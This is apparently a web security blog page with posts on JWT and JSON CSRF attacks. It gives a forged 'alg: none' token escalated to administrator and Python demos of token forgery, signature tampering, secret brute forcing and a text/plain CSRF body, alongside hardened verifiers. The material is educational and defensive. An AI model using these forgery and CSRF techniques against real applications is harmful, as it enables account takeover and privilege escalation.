
Showing posts with the label wapt

JWT token exploitation by none algorithm

Modify the algorithm to none

Change the header so that "alg" is "none" and delete the signature part, but leave the trailing dot after the payload: the token must still have three dot-separated segments, the last one empty. Send the request and check whether the server accepts the unsigned token. Some libraries reject the literal string "none" but accept case variants such as "None", "NONE" or "nOnE", so try those as well; a correctly configured library refuses an unsigned token unless the application explicitly allows the none algorithm.

Example:

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY0MTczNDJ9.

Header: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
{"typ": "JWT", "alg": "none"}

Payload: eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY0MTczNDJ9
{"iss": "portswigger", "sub": "administrator", "exp": 1656417342}

References: https://portswigger.net/web-security/jwt https://jwt.io/

JWT Vulnerabilities List (Simple Explanation)

JWT vulnerabilities:

- Tamper without modifying anything
- Modify the algorithm to none
- Brute-force a weak signing key
- Privilege escalation by JWK header injection (RS256 or another asymmetric signing algorithm)
- Privilege escalation by JKU header injection (RS256 or another asymmetric signing algorithm)
- Exploitation of the kid header (directory traversal and command injection) (RS256 and HS256)
- Privilege escalation by algorithm confusion when the server public key is exposed and the token algorithm is RS256 (change the algorithm from RS256, or another asymmetric algorithm, to HS256, a symmetric algorithm, and sign with the public key as the HMAC secret)
- Privilege escalation by algorithm confusion when the server public key is not exposed and the token algorithm is RS256 (the same change, after first recovering the public key, for example from two tokens signed with it)
- Cross-service relay attack
- Check exp (whether an expired token is still accepted)

Tamper without modifying anything

Change a value in the payload, keep the original signature, and check whether the server actually validates the signature.

How are the JWT token and refresh token received by the application from the server?

The basic sequence for getting tokens is as follows: The client sends a username/password combination to the server. The server validates the credentials. If authentication is successful, the server creates a JWT (the access token) and a refresh token; otherwise it returns an error response. On successful authentication, the client receives the JWT in the response body and the refresh token in a cookie set with all the cookie protection flags (HttpOnly, Secure, and SameSite=Strict wherever possible, to prevent CSRF). The client stores the access token in memory, i.e. in a variable in the front-end code (like const accessToken = xyz). Yes, this means the access token is gone when the user refreshes the page or opens the site in a new tab; that is why we have the refresh token. We do not put the access token in localStorage or in a cookie written via JavaScript, because anything readable by script is easy for an attacker to dump, making it more prone to theft via XSS. Note that HttpOnly only stops script from reading the refresh cookie; a script injected via XSS can still call the refresh endpoint with it, so that endpoint needs its own CSRF protection (hence SameSite) and access tokens should stay short-lived. We can also u

What is JWT - JSON Web Tokens (Simple Explanation)

What is JWT? A JWT is a compact, base64url-encoded, dot-separated string used to transmit information between server and client. It mostly carries user information (claims) used for authorization. A JWT can be sent in a URL, as a POST parameter, or in an HTTP header. The information in a JWT can be verified and trusted because it is digitally signed; note that the header and payload are only encoded, not encrypted, so anyone holding the token can read them. A JWT looks like:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

A JWT has three parts (see https://jwt.io/):

Header: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
{"alg": "HS256", "typ": "JWT"}

Payload: eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ
{"sub": "1234567890", "name": "John Doe", "iat": 1516239022}

Signature: SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), your-secret)

Uses of JWT token * Authorization: After successful auth
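The three JWT posts above (the none-algorithm attack, the vulnerability list, and this structural explanation) share one added example below. It is not code from the original posts: a minimal HS256 JWT implementation on the Python standard library that decodes the example token from this post, shows a verifier that trusts the header's alg beside one that pins HS256 and checks exp, and runs the "alg": "none" forgery, the "tamper without modifying anything" check, and a weak-key brute force. The secret "secret1", the wordlist, the "wiener" subject and the fixed clock are constructed for the demo; the issuer and exp claims are the ones from the none-algorithm post.

```python
import base64
import hashlib
import hmac
import json
import time


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode(header: dict, payload: dict, secret: bytes = b"") -> str:
    """Serialize header.payload and append an HS256 signature (nothing for alg none)."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{h}.{p}"
    if header.get("alg") == "none":
        return signing_input + "."  # keep the trailing dot: three segments, last one empty
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def decode_unverified(token: str):
    """Split the three parts and decode them without checking the signature."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s)


def verify_trusting_header(token: str, secret: bytes) -> bool:
    """Vulnerable verifier: lets the attacker-controlled header choose the algorithm."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") == "none":
        return s == ""  # an unsigned token is accepted as-is
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(s))


def verify_pinned_hs256(token: str, secret: bytes, now=None) -> bool:
    """Hardened verifier: the server fixes the algorithm, requires a signature, checks exp."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        payload = json.loads(b64url_decode(p))
    except (ValueError, UnicodeDecodeError):
        return False
    if header.get("alg") != "HS256" or not s:
        return False
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return False
    now = time.time() if now is None else now
    return isinstance(payload.get("exp"), (int, float)) and payload["exp"] > now


def none_attack(token: str) -> str:
    """Set alg to none, escalate the sub claim and drop the signature."""
    header, payload, _ = decode_unverified(token)
    header["alg"] = "none"
    payload["sub"] = "administrator"
    return encode(header, payload)


def tamper_keep_signature(token: str, **changes) -> str:
    """Change payload claims but keep the original signature segment."""
    h, p, s = token.split(".")
    payload = dict(json.loads(b64url_decode(p)), **changes)
    return f"{h}.{b64url_encode(json.dumps(payload, separators=(',', ':')).encode())}.{s}"


def brute_force_secret(token: str, wordlist):
    """Return the wordlist entry that reproduces the token's HS256 signature, or None."""
    h, p, s = token.split(".")
    sig, signing_input = b64url_decode(s), f"{h}.{p}".encode()
    for word in wordlist:
        if hmac.compare_digest(hmac.new(word.encode(), signing_input, hashlib.sha256).digest(), sig):
            return word
    return None


# Constructed demo inputs: a deliberately weak secret, a tiny wordlist, claims from the post.
SECRET = b"secret1"
WORDLIST = ["password", "jwt", "secret", "secret1", "changeme"]
HEADER = {"typ": "JWT", "alg": "HS256"}
CLAIMS = {"iss": "portswigger", "sub": "wiener", "exp": 1656417342}
NOW = 1656417000  # fixed clock (before exp) so the demo is reproducible


def run_demo() -> dict:
    legit = encode(HEADER, CLAIMS, SECRET)
    forged = none_attack(legit)
    tampered = tamper_keep_signature(legit, sub="administrator")
    return {
        "legit_ok": verify_pinned_hs256(legit, SECRET, NOW),
        "none_vulnerable": verify_trusting_header(forged, SECRET),  # the forgery is accepted
        "none_hardened": verify_pinned_hs256(forged, SECRET, NOW),
        "tampered_vulnerable": verify_trusting_header(tampered, SECRET),  # HMAC is still checked
        "tampered_hardened": verify_pinned_hs256(tampered, SECRET, NOW),
        "recovered_secret": brute_force_secret(legit, WORDLIST),
        "forged_token": forged,
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The forged token that `none_attack` produces is byte-for-byte the example from the none-algorithm post, because the header and payload are serialized without whitespace in the same key order. The tampered token fails on both verifiers here; the "tamper without modifying anything" check is positive only when a server accepts it, which means the signature is never validated at all.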

Don't merge OAuth and OpenID Connect concepts while understanding OAuth (Simple Explanation)

I was also confused while understanding both concepts; I thought that using Gmail/Facebook credentials to log in to abc.com was an OAuth concept, but I was wrong. That is the OpenID Connect concept, which works on top of the OAuth protocol. So what is OAuth? OAuth = Open Authorization. As the name suggests, it is about "authorization", so it is an authorization concept. As the internet grew, developers needed a mechanism by which abc.com could read data from anything.com without the user handing the anything.com password to the abc.com server. It improves the user experience and also grows the business. Let's explain OAuth with a simple example: we have all seen the case where we log in to an application (abc.com) with abc.com credentials and are then offered an option like "import contacts from Gmail". When we click on that link, it redirects us to Gmail, which asks for the Gmail credentials, and after entering the credentia

Ways To Exploit JSON CSRF (Simple Explanation)

How can JSON CSRF be exploited? JSON CSRF can be exploited in four ways, depending on the factors discussed below:

- Using a normal HTML form (Form1): when the Content-Type is not validated at the server side and the server does not check whether the POST body is well-formed JSON.
- Using a normal HTML form (Form2, via a fetch request): when the Content-Type is not validated at the server side but the server does check that the POST body is well-formed JSON.
- Using an XMLHttpRequest/AJAX request: when the Content-Type is validated at the server side and the server accepts only "Content-Type: application/json" (a cross-origin request with that Content-Type triggers a CORS preflight, so this only works when the server's CORS policy lets the attacker's origin through).
- Using a Flash file: when the Content-Type is validated at the server side, the server accepts only "Content-Type: application/json", and CORS is also configured properly.

Case 1: When the Content-Type is not validated at the server side and the server does not check whether the POST body is well-formed JSON.

Why do we need to check by changing the Content-Type? Because we ca
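Case 1 above, simulated in Python without a browser, as an added example that is not code from the original post: the attacker's single form field is built so that the "=" the browser inserts between name and value lands inside a throwaway JSON key, and two hypothetical server handlers show why the Content-Type check matters. The application origin https://app.example, the attacker origin https://evil.example, the cookie value and the target payload are all constructed for the demo.

```python
import json

# Constructed demo values: what the attacker wants written to the victim's account,
# and the hypothetical origin of the vulnerable application.
TARGET_PAYLOAD = {"email": "attacker@example.com"}
ALLOWED_ORIGIN = "https://app.example"


def attacker_form_fields(target: dict):
    """Build the one <input name=... value=...> pair for a text/plain form.

    The browser joins name and value with '='. A dummy trailing key ("pad")
    absorbs that '=' so the assembled body is still valid JSON.
    """
    body = json.dumps(target, separators=(",", ":"))   # '{"email":"attacker@example.com"}'
    name = body[:-1] + ',"pad":"'                       # drop the closing brace, open the pad key
    value = '"}'                                        # close the pad string and the object
    return [(name, value)]


def browser_encode_text_plain(fields):
    """Body a browser sends for <form method="POST" enctype="text/plain">:
    one 'name=value' line per field, CRLF separated, with no percent-encoding."""
    return "\r\n".join(f"{name}={value}" for name, value in fields)


def lenient_handler(headers: dict, body: str):
    """Case 1 server: ignores Content-Type and accepts anything json.loads can parse."""
    try:
        return 200, json.loads(body)
    except ValueError:
        return 400, None


def strict_handler(headers: dict, body: str):
    """Hardened server: JSON media type only, and the request must come from our own origin."""
    media_type = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if media_type != "application/json":
        return 415, None
    if headers.get("Origin") != ALLOWED_ORIGIN:      # browsers always send Origin on POST
        return 403, None
    try:
        return 200, json.loads(body)
    except ValueError:
        return 400, None


# Constructed request as the victim's browser emits it after the attacker's page
# auto-submits the form; the session cookie is attached by the browser, not the attacker.
ATTACK_BODY = browser_encode_text_plain(attacker_form_fields(TARGET_PAYLOAD))
ATTACK_HEADERS = {
    "Content-Type": "text/plain",
    "Origin": "https://evil.example",
    "Cookie": "session=victim-session-id",
}
# Constructed legitimate request from the application's own front end.
LEGIT_BODY = json.dumps({"email": "victim@example.com"})
LEGIT_HEADERS = {
    "Content-Type": "application/json",
    "Origin": ALLOWED_ORIGIN,
    "Cookie": "session=victim-session-id",
}


def run_demo() -> dict:
    return {
        "attack_body": ATTACK_BODY,
        "lenient": lenient_handler(ATTACK_HEADERS, ATTACK_BODY),
        "strict": strict_handler(ATTACK_HEADERS, ATTACK_BODY),
        "strict_legit": strict_handler(LEGIT_HEADERS, LEGIT_BODY),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Against a real target the same name/value pair goes into an input inside a form with method="POST", enctype="text/plain" and the endpoint as action, auto-submitted by a script on the attacker's page. Checking Content-Type alone is not a complete defence (Case 3 and Case 4 of the post target servers that do check it), so the strict handler also verifies the Origin header; a CSRF token or SameSite cookies are the usual complement.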